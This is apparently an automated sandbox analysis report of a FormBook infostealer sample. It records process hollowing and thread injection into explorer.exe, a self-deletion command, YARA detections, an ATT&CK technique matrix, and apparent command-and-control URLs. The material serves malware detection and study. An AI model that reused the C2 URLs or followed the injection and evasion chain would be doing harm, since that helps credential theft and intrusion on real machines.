          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808D34 mov eax, dword ptr fs:[00000030h]10_2_04808D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]10_2_047661A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]10_2_047661A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047635A1 mov eax, dword ptr fs:[00000030h]10_2_047635A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B69A6 mov eax, dword ptr fs:[00000030h]10_2_047B69A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762990 mov eax, dword ptr fs:[00000030h]10_2_04762990
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]10_2_0476FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]10_2_0476FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A185 mov eax, dword ptr fs:[00000030h]10_2_0476A185
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475C182 mov eax, dword ptr fs:[00000030h]10_2_0475C182
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477927A mov eax, dword ptr fs:[00000030h]10_2_0477927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474766D mov eax, dword ptr fs:[00000030h]10_2_0474766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]10_2_047EB260
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]10_2_047EB260
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FEA55 mov eax, dword ptr fs:[00000030h]10_2_047FEA55
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047C4257 mov eax, dword ptr fs:[00000030h]10_2_047C4257
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]10_2_047FAE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]10_2_047FAE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EFE3F mov eax, dword ptr fs:[00000030h]10_2_047EFE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473E620 mov eax, dword ptr fs:[00000030h]10_2_0473E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808ED6 mov eax, dword ptr fs:[00000030h]10_2_04808ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]10_2_04774A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]10_2_04774A2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov ecx, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]10_2_0473AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]10_2_0473AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04753A1C mov eax, dword ptr fs:[00000030h]10_2_04753A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]10_2_0476A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]10_2_0476A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04768E00 mov eax, dword ptr fs:[00000030h]10_2_04768E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F1608 mov eax, dword ptr fs:[00000030h]10_2_047F1608
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04748A0A mov eax, dword ptr fs:[00000030h]10_2_04748A0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762AE4 mov eax, dword ptr fs:[00000030h]10_2_04762AE4
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047616E0 mov ecx, dword ptr fs:[00000030h]10_2_047616E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047476E2 mov eax, dword ptr fs:[00000030h]10_2_047476E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04778EC7 mov eax, dword ptr fs:[00000030h]10_2_04778EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047636CC mov eax, dword ptr fs:[00000030h]10_2_047636CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04762ACB mov eax, dword ptr fs:[00000030h]10_2_04762ACB
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047EFEC0 mov eax, dword ptr fs:[00000030h]10_2_047EFEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]10_2_0474AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]10_2_0474AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476FAB0 mov eax, dword ptr fs:[00000030h]10_2_0476FAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047B46A7 mov eax, dword ptr fs:[00000030h]10_2_047B46A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]10_2_0476D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]10_2_0476D294
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04808A62 mov eax, dword ptr fs:[00000030h]10_2_04808A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFE87 mov eax, dword ptr fs:[00000030h]10_2_047CFE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]10_2_04763B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]10_2_04763B7A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473DB60 mov ecx, dword ptr fs:[00000030h]10_2_0473DB60
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474FF60 mov eax, dword ptr fs:[00000030h]10_2_0474FF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04805BA5 mov eax, dword ptr fs:[00000030h]10_2_04805BA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473F358 mov eax, dword ptr fs:[00000030h]10_2_0473F358
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473DB40 mov eax, dword ptr fs:[00000030h]10_2_0473DB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474EF40 mov eax, dword ptr fs:[00000030h]10_2_0474EF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476E730 mov eax, dword ptr fs:[00000030h]10_2_0476E730
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]10_2_04734F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]10_2_04734F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475F716 mov eax, dword ptr fs:[00000030h]10_2_0475F716
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F131B mov eax, dword ptr fs:[00000030h]10_2_047F131B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]10_2_047CFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]10_2_047CFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]10_2_0476A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]10_2_0476A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047737F5 mov eax, dword ptr fs:[00000030h]10_2_047737F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480070D mov eax, dword ptr fs:[00000030h]10_2_0480070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0480070D mov eax, dword ptr fs:[00000030h]10_2_0480070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047603E2 mov eax, dword ptr fs:[00000030h]10_2_047603E2
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exe; Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Section unmapped: C:\Windows\SysWOW64\control.exe base address: 3C0000
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\control.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: explorer.exe, 00000006.00000002.916660686.0000000000AD8000.00000004.00000020.sdmp; Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.665682379.0000000001080000.00000002.00000001.sdmp, control.exe, 0000000A.00000002.917227352.0000000002FB0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Queries volume information: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          Behavior Graph ID: 412308; Sample: 350969bc_by_Libranalysis; Startdate: 12/05/2021; Architecture: WINDOWS; Score: 100
          Start: DNS/IP: www.woo.education; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
            -> started 350969bc_by_Libranalysis.exe (process 11): dropped C:\Users\...\350969bc_by_Libranalysis.exe.log, ASCII; signature: Tries to detect virtualization through RDTSC time measurements
              -> started 350969bc_by_Libranalysis.exe (process 15): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                -> injected explorer.exe (process 22): DNS/IP: www.sabaidiving.com 192.64.147.164, 49771, 80 VOODOO1US United States; cityofhouston.info 103.15.186.68, 49764, 80 VECTANTARTERIANetworksCorporationJP Japan; 19 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
                  -> started control.exe (process 26): signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    -> started cmd.exe (process 29)
                      -> started conhost.exe (process 31)
              -> started 350969bc_by_Libranalysis.exe (process 18)
              -> started 350969bc_by_Libranalysis.exe (process 20)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          350969bc_by_Libranalysis.exe | 36% | ReversingLabs | Win32.Trojan.Wacatac
          350969bc_by_Libranalysis.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.350969bc_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          cityofhouston.info | 0% | Virustotal |
          onlinecasinocrazy.com | 0% | Virustotal |
          onemoresysadmin.com | 0% | Virustotal |
          www.sabaidiving.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.toypoodlebreedershome.com/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.cityofhouston.info/i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (3 entries) | safe
          http://www.sabaidiving.com/i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation (3 entries) | safe
          http://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.countrywideeconomy.com | 0% | Avira URL Cloud | safe
          http://www.onlinecasinocrazy.com/i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation (3 entries) | safe
